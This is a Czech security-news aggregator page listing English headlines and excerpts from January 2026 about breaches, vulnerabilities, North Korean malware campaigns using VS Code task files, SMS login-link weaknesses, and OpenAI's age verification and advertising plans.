Security-Portal.cz je internetový portál zaměřený na počítačovou bezpečnost, hacking, anonymitu, počítačové sítě, programování, šifrování, exploity, Linux a BSD systémy. Provozuje spoustu zajímavých služeb a podporuje příznivce v zajímavých projektech.

Kategorie

Zendesk ticket systems hijacked in massive global spam wave

Bleeping Computer - 4 hodiny 8 min zpět
People worldwide are being targeted by a massive spam wave originating from unsecured Zendesk support systems, with victims reporting receiving hundreds of emails with strange and sometimes alarming subject lines. [...]
Kategorie: Hacking & Security

Millions of people imperiled through sign-in links sent by SMS

Ars Technica - 4 hodiny 33 min zpět

Websites that authenticate users through links and codes sent in text messages are imperiling the privacy of millions of people, leaving them vulnerable to scams, identity theft, and other crimes, recently published research has found.

The links are sent to people seeking a range of services, including those offering insurance quotes, job listings, and referrals for pet sitters and tutors. To eliminate the hassle of collecting usernames and passwords—and for users to create and enter them—many such services instead require users to provide a cell phone number when signing up for an account. The services then send authentication links or passcodes by SMS when the users want to log in.

Easy to execute at scale

A paper published last week has found more than 700 endpoints delivering such texts on behalf of more than 175 services that put user security and privacy at risk. One practice that jeopardizes users is the use of links that are easily enumerated, meaning scammers can guess them by simply modifying the security token, which usually appears at the right of a URL. By incrementing the token—for instance, by first changing 123 to 124 or ABC to ABD and so on—the researchers were able to access accounts belonging to other users. From there, the researchers could view personal details, such as partially completed insurance applications.

Read full article

Comments

Chainlit AI framework bugs let hackers breach cloud environments

Bleeping Computer - 21 Leden, 2026 - 23:37
Two high-severity vulnerabilities in Chainlit, a popular open-source framework for building conversational AI applications, allow reading any file on the server and leak sensitive information. [...]
Kategorie: Hacking & Security

Cisco fixes Unified Communications RCE zero day exploited in attacks

Bleeping Computer - 21 Leden, 2026 - 23:16
Cisco has fixed a critical Unified Communications and Webex Calling remote code execution vulnerability, tracked as CVE-2026-20045, that has been actively exploited as a zero-day in attacks. [...]
Kategorie: Hacking & Security

New Android malware uses AI to click on hidden browser ads

Bleeping Computer - 21 Leden, 2026 - 23:07
A new family of Android click-fraud trojans leverages TensorFlow machine learning models to automatically detect and interact with specific advertisement elements. [...]
Kategorie: Hacking & Security

Online retailer PcComponentes says data breach claims are fake

Bleeping Computer - 21 Leden, 2026 - 21:55
PcComponentes, a major technology retailer in Spain, has denied claims of a data breach on its systems impacting 16 million customers, but confirmed it suffered a credential stuffing attack. [...]
Kategorie: Hacking & Security

OpenAI to add age verification to ChatGPT

Computerworld.com [Hacking News] - 21 Leden, 2026 - 19:51


OpenAI has adding age verification to ChatGPT following reports that several children and young people have taken their own lives after conversations with the popular chatbot. The move echoes a recent decision by TikTok to do the same thing to protect underage users from accessing inappropriate content.

ChatGPT already has restrictions for users who state that they are under 18. Unsurprisingly, there are users who lie about their age in order to discuss sensitive topics. What’s new is that OpenAI is now adding algorithms to detect when someone lies about their age. In such cases, the restrictions will be imposed automatically.

If the algorithm draws the wrong conclusion about age, users can reset their account by uploading a photograph of themselves, according to Techcrunch.

Kategorie: Hacking & Security

Fortinet admins report patched FortiGate firewalls getting hacked

Bleeping Computer - 21 Leden, 2026 - 18:49
Fortinet customers are seeing attackers exploiting a patch bypass for a previously fixed critical FortiGate authentication vulnerability (CVE-2025-59718) to hack patched firewalls. [...]
Kategorie: Hacking & Security

North Korean PurpleBravo Campaign Targeted 3,136 IP Addresses via Fake Job Interviews

The Hacker News - 21 Leden, 2026 - 18:17
As many as 3,136 individual IP addresses linked to likely targets of the Contagious Interview activity have been identified, with the campaign claiming 20 potential victim organizations spanning artificial intelligence (AI), cryptocurrency, financial services, IT services, marketing, and software development sectors in Europe, South Asia, the Middle East, and Central America. The new findings Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

GDPR violations are rising sharply

Computerworld.com [Hacking News] - 21 Leden, 2026 - 18:14

It’s becoming increasingly common for companies and organizations to be reported for violations of the GDPR personal data protection law, according to a new report from the DLA Piper law firm. On average, there are now 443 reports of GDPR violations per day in the EU, an increase of 22% compared to 2024.

“The report confirms that cybersecurity issues are intensifying,” Gustav Lundin from DLA Piper said in a statement. “For Swedish organizations, this means that both technical and organizational protective measures need to be reviewed in order to keep pace with the emerging risks and requirements.”

In 2025, total fines amounted to €1.2 billion, most of which involved technology and social media companies. That figure was in line with the previous year.

Kategorie: Hacking & Security

Jamf has a warning for macOS vibe coders

Computerworld.com [Hacking News] - 21 Leden, 2026 - 18:05

Just yesterday, we noted the growing threat of ransomware. Now, Jamf Threat Labs is warning that North Korean threat actors are abusing Visual Studio Code task configuration files for malware delivery in a campaign aimed at macOS software developers.

It’s a classic attempt in which developers are tricked into using maliciously crafted GitHub/GitLab projects that contain malicious JavaScript code. 

“When the project is opened, Visual Studio Code prompts the user to trust the repository author,” Jamf said. “If that trust is granted, the application automatically processes the repository’s tasks.json configuration file, which can result in embedded arbitrary commands being executed on the system.”

What is this new threat?

The malware enables execution of arbitrary JavaScript code on an infected system and collects system information and the public-facing IP address. Jamf also uncovered a JavaScript-based backdoor that provides remote code execution, persistent communication with command-and-control infrastructure and system fingerprinting on macOS system; among other things, that means the malware authors can also switch the vulnerability off and on again remotely.

The bottom line, of course, is that developers must be careful what they use when building apps. “Developers should remain cautious when interacting with third-party repositories, especially those shared directly or originating from unfamiliar sources,” Jamf warned.

AI, the new attack surface

What’s critical about this particular attack vector is its attempt to exploit the “vibe-coding” trend. Visual Studio Code is, after all, the open source AI code editor used by developers across the planet.

This latest exploit does make me wonder if and when we’ll begin to see additional exploits built to capitalize on the latest trends in coding. To what extent can the decision-making systems within AI code companion services be tricked into connecting to malware-infested packages?

Given the growing sophistication of threat actors and the involvement of nation states in creating threats, the latest exploit makes it crystal clear that people are already looking at this. The magnitude of this threat can only grow in future as quantum computers are used to find weaknesses in AI models that can themselves be exploited to distribute malware.

AI already famously hallucinates, so weaponizing those visions is nothing other than a logical next step. “Slopsquatting,” where attackers create malicious software packages using names AI models have already hallucinated into existance, is already a thing.

What to do?

To some extent, when using AI agents to help craft code, it becomes even more important to put that code through human code review. Developers — and users — absolutely must put their code through robust security checks, particularly against rogue permissions, data sharing, or worse. AI-generated code should never be allowed to bypass established security processes.

Further out, app distribution service providers must also wake up to the need to insert additional layers of protection within automated or human-driven code review in order to protect against this kind of weaponization in vibe coding.

This could emerge as a particular threat in the current legislative environment concerning app stores. If you think about Europe, there is a danger that as new App Stores appear, not every single code review process they put in place will be capable of catching these kinds of inserted risks. Think about the complex tapestries of spoofs, infected depositories, and fake name malwares that can be created to side-step automated code verification services. 

The answer to the AI threat will be…more AI!

AI will eventually be used to combat AI. But like everything else in life, there will always be a more powerful AI waiting in the wings to take out both protagonists and open a new chapter in the fight.

Acclaimed author and enthusiastic Mac user Douglas Adams once posited that Deep Thought, the computer, told us the answer to the ultimate question of life, the universe, and everything was 42, which only made sense once the question was redefined. But in today’s era, we cannot be certain the computer did not hallucinate.

Returning to Earth with a gentle bump, Jamf’s latest security story should be seen as a warning to coders everywhere to be wary when using third-party code. Verify before you ship, because, as Adams also wrote: “A common mistake that people make when trying to design something completely foolproof is to underestimate the ingenuity of complete fools.”

 You can follow me on social media! Join me on BlueSky,  LinkedInMastodon, and MeWe

Kategorie: Hacking & Security

Fake Lastpass emails pose as password vault backup alerts

Bleeping Computer - 21 Leden, 2026 - 17:58
LastPass is warning of a new phishing campaign disguised as a maintenance notification from the service, asking users to back up their vaults in the next 24 hours. [...]
Kategorie: Hacking & Security

Zoom and GitLab Release Security Updates Fixing RCE, DoS, and 2FA Bypass Flaws

The Hacker News - 21 Leden, 2026 - 16:42
Zoom and GitLab have released security updates to resolve a number of security vulnerabilities that could result in denial-of-service (DoS) and remote code execution. The most severe of the lot is a critical security flaw impacting Zoom Node Multimedia Routers (MMRs) that could permit a meeting participant to conduct remote code execution attacks. The vulnerability, tracked as CVE-2026-22844 Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Microsoft shares workaround for Outlook freezes after Windows update

Bleeping Computer - 21 Leden, 2026 - 16:12
Microsoft shared a temporary workaround for customers experiencing Outlook freezes after installing this month's Windows security updates. [...]
Kategorie: Hacking & Security

You Got Phished? Of Course! You're Human...

Bleeping Computer - 21 Leden, 2026 - 15:30
Phishing succeeds not because users are careless, but because attackers exploit human timing, context, and emotion. Flare shows how modern phishing has become industrialized, scalable, and increasingly hard to spot. [...]
Kategorie: Hacking & Security

Hackers exploit security testing apps to breach Fortune 500 firms

Bleeping Computer - 21 Leden, 2026 - 15:00
Threat actors are exploiting misconfigured web applications used for security training and internal penetration testing, such as DVWA, OWASP Juice Shop, Hackazon, and bWAPP, to gain access to cloud environments of Fortune 500 companies and security vendors. [...]
Kategorie: Hacking & Security

GitLab warns of high-severity 2FA bypass, denial-of-service flaws

Bleeping Computer - 21 Leden, 2026 - 14:57
GitLab has patched a high-severity two-factor authentication bypass impacting community and enterprise editions of its software development platform. [...]
Kategorie: Hacking & Security

OpenAI advertising paid per impression will launch next month, says report

Computerworld.com [Hacking News] - 21 Leden, 2026 - 14:46

OpenAI is already working with advertisers to test showing ads to ChatGPT users, and could launch the service commercially as early as next month, according to a news report.

The company announced only last week its plans to insert ads in chats with its AI bots, something CEO Sam Altman once said would be a “last resort” for the company.

Advertisers will initially pay per impression (PPM), and not per click (PPC) as is more common with web-based advertising, The Information reported on Wednesday, citing two people familiar with the company’s plans.

The PPM model will bring in revenue for OpenAI even if users do not interact with the ads but will give advertisers little indication of the impact of their spending.

OpenAI has touted early access to the service to dozens of advertisers, who have each been asked to commit to spend less than $1 million over a trial period of several weeks, the report said, citing the same sources. No details of pricing for the service have been released, so there’s no telling how many impressions the testers will get for their money.

The company is clearly still building the infrastructure for the service: It won’t offer the advertisers self-service tools for buying and managing their ads during the test phase, as it is still working on the technology, the report said.

OpenAI unveiled its plans to slip ads into chats with its bots last Friday, the same day it unveiled ChatGPT Go, a new $8/month pricing tier that will be supported by advertising. Ads will also be displayed to users of its free service, but not (yet) to users of the $20/month ChatGPT Plus or $200/month ChatGPT Pro tiers, or to enterprise customers.

In December, ChatGPT appeared to jump the gun, showing what users took for ads, but that were in fact simply the app suggestions OpenAI announced in October.

Last resort

Altman told attendees at a May 2024 Harvard Business School event, “I kind of think of ads as a last resort for us for a business model,” adding, “I would do it if it meant that was the only way to get everybody in the world access to great services, but if we can find something that doesn’t do that, I would prefer that.”

The company’s rushed announcement of the ad service on Friday, before it was ready for testing, prompted speculation that it had failed to find other ways to fund its operations.

OpenAI CFO Sarah Friar took to the company’s blog over the weekend to refute such concerns, saying that while the company’s compute costs are tripling every year, so is its revenue. Compute capacity grew from 0.2 GW in 2023 to 0.6 GW in 2024 and around 1.9 GW in 2025, Friar wrote, while “ARR” rose from $2 billion in 2023 to $6 billion in 2024 and over $20 billion in 2025.

But there were some critical omissions from Friar’s post.

She didn’t spell out what she meant by ARR. One meaning, annual recurring revenue, can be a reliable, if hard-to-calculate, indicator of a company’s future fortunes, measuring present (and likely future) spend from committed customers. But the abbreviation can also have a much looser sense, annual run rate, which is typically calculated as the best or most-recent month’s revenue multiplied by 12 — an easily inflated measure of performance for fast-growing companies like OpenAI, or those with more volatile month-to-month performance.

Most notably, Friar did not say whether OpenAI’s ARR, by either definition, matched or exceeded its costs, key for the company’s long-term survival.

The bottom line

If OpenAI is counting on advertising to bolster its bottom line, the bottom line is exactly where they will appear during the test phase, as the company intends to add them at the end of answers in ChatGPT, clearly labelled as “Sponsored” and separated from what it calls the “organic” answer written by its AI model.

In the blog post announcing the imminent introduction of the service, it suggested that users might choose to ask questions about an ad in order to make a purchase decision, hinting at why it is favoring pay-per-impression over pay-per-click: Those questions could provide advertisers with the interaction data they crave, and answering them could potentially open up another monetization stream for OpenAI.

Kategorie: Hacking & Security

Tesla hacked, 37 zero-days demoed at Pwn2Own Automotive 2026

Bleeping Computer - 21 Leden, 2026 - 13:16
Security researchers have hacked the Tesla Infotainment System and earned $516,500 after exploiting 37 zero-days on the first day of the Pwn2Own Automotive 2026 competition. [...]
Kategorie: Hacking & Security

Wikipedia volunteers spent years cataloging AI tells. Now there's a plugin to avoid them.

Ars Technica - 21 Leden, 2026 - 13:15

On Saturday, tech entrepreneur Siqi Chen released an open source plugin for Anthropic's Claude Code AI assistant that instructs the AI model to stop writing like an AI model. Called "Humanizer," the simple prompt plugin feeds Claude a list of 24 language and formatting patterns that Wikipedia editors have listed as chatbot giveaways. Chen published the plugin on GitHub, where it has picked up over 1,600 stars as of Monday.

"It's really handy that Wikipedia went and collated a detailed list of 'signs of AI writing,'" Chen wrote on X. "So much so that you can just tell your LLM to... not do that."

The source material is a guide from WikiProject AI Cleanup, a group of Wikipedia editors who have been hunting AI-generated articles since late 2023. French Wikipedia editor Ilyas Lebleu founded the project. The volunteers have tagged over 500 articles for review and, in August 2025, published a formal list of the patterns they kept seeing.

Read full article

Comments

Syndikovat obsah